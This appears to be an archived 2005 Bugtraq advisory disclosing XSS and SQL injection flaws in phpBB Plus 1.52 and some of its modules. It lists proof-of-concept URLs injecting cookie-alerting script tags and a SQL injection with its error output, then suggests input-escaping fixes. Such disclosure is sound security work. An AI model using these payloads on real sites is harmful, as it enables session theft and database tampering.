[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    Multiple Sql injection and XSS vulnerabilities in phpBB Plus
From:       dcrab <dcrab () hackerscenter ! com>
Date:       2005-04-13 22:32:03
Message-ID: 20050413223203.25005.qmail () www ! securityfocus ! com
[Download RAW message or body]



Dcrab 's Security Advisory
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at \
http://www.digitalparadox.org/services.ah

Severity: Medium
Title: Multiple Sql injection and XSS vulnerabilities in phpBB Plus v.1.52 and below \
                and some of its modules.
Date: 13/04/2005

Vendor: PhpBB2 Plus and Smartor
Vendor Website: http://www.phpbb2.de, http://smartor.is-root.com/
Summary: There are, multiple sql injection and xss vulnerabilities in phpbb plus \
v.1.52 and below and some of its modules..

Proof of Concept Exploits: 

PhpBB Plus v.1.52 and below
http://localhost/groupcp.php?g=881&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


http://localhost/index.php?c=1&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


http://localhost/index.php?c='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bsid=5e4b2554e73f8ca07f348b5f68c85217
 Pops cookie


http://localhost/index.php?mark='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bsid=5e4b2554e73f8ca07f348b5f68c85217
 Pops cookie


http://localhost/portal.php?article=0&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


http://localhost/portal.php?article='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&amp%3bsid=2fb087b5e3c7098d0e48a76a9c67cf59
 Pops cookie


http://localhost/viewforum.php?f=1&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


http://localhost/viewtopic.php?p=58834&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


Photo Album v2.0.53

http://localhost/album_search.php?mode='SQL_INJECTION&search=dcrab
SQL INJECTION

DEBUG MODE

SQL Error : 1064 You have an error in your SQL syntax. Check the manual that \
corresponds to your MySQL server version for the right syntax to use near 'LIKE \
'%\'SQL_INJECTION%' AND p.pic_cat_id = c.cat_id OR p.pic_c

SELECT p.pic_id, p.pic_title, p.pic_desc, p.pic_user_id, p.pic_username, p.pic_time, \
p.pic_cat_id, p.pic_approval, c.cat_id, c.cat_title FROM phpbb_album AS \
p,phpbb_album_cat AS c WHERE p.pic_approval = 1 AND LIKE '%\'SQL_INJECTION%' AND \
p.pic_cat_id = c.cat_id OR p.pic_cat_id = 0 AND p.pic_approval = 1 AND LIKE \
'%\'SQL_INJECTION%' ORDER BY p.pic_time DESC

Line : 105
File : album_search.php


http://localhost/album_cat.php?cat_id=5&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


http://localhost/album_comment.php?pic_id=224&amp%3bsid='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
 Pops cookie


Calender MOD
http://localhost/calendar_scheduler.php?d=1113174000&mode=&start='">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&amp%3bsid=d32836b8178e5d62b2b173ed177e4b0d
 Pops cookie


Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), \
mysql_real_escape_string() and other functions for input validation before passing \
user input to the mysql database, or before echoing data on the screen, would solve \
these problems.

Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah

Author: 
These vulnerabilties have been found and released by Diabolic Crab, Email: \
dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me \
regarding these vulnerabilities. You can find me at, http://www.hackerscenter.com or \
http://digitalparadox.org/. Lookout for my soon to come out book on Secure coding \
with php.


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic